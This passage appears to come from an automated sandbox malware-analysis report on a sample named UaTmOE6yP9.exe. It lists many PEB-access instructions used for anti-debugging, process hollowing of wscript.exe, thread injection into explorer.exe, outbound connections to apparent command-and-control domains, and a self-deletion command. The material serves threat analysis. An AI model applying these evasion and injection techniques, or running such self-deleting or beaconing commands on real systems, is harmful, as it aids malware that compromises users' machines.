Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052535A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05251DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05251DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05251DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052B41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052D8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05240050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05240050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052690AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052258EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05224F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05224F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05253B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05253B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05231B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05231B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05238794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052637F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05264A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05264A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05258E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05238A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05243A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052B4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052376E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052516E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05268EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052536CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8ED6 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 3_2_00409B40 LdrLoadDll,

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 108.179.246.105 80
Source: C:\Windows\explorer.exe	Domain query: www.corlora.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe	Domain query: www.thehauntdepot.com
Source: C:\Windows\explorer.exe	Domain query: www.bellaalubo.com
Source: C:\Windows\explorer.exe	Domain query: www.pastlinks.com
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe	Network Connect: 54.85.93.188 80
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.jspagnier-graveur.com
Source: C:\Windows\explorer.exe	Domain query: www.behiscalm.com
Source: C:\Windows\explorer.exe	Domain query: www.productprinting.online
Source: C:\Windows\explorer.exe	Domain query: www.miyonbuilding.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 12B0000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Memory written: C:\Users\user\Desktop\UaTmOE6yP9.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3440

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'

Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: UaTmOE6yP9.exe, 00000000.00000002.608713457.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.368759315.0000000000EE0000.00000002.00020000.sdmp, wscript.exe, 00000009.00000002.608369932.0000000003AB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Queries volume information: C:\Users\user\Desktop\UaTmOE6yP9.exe VolumeInformation
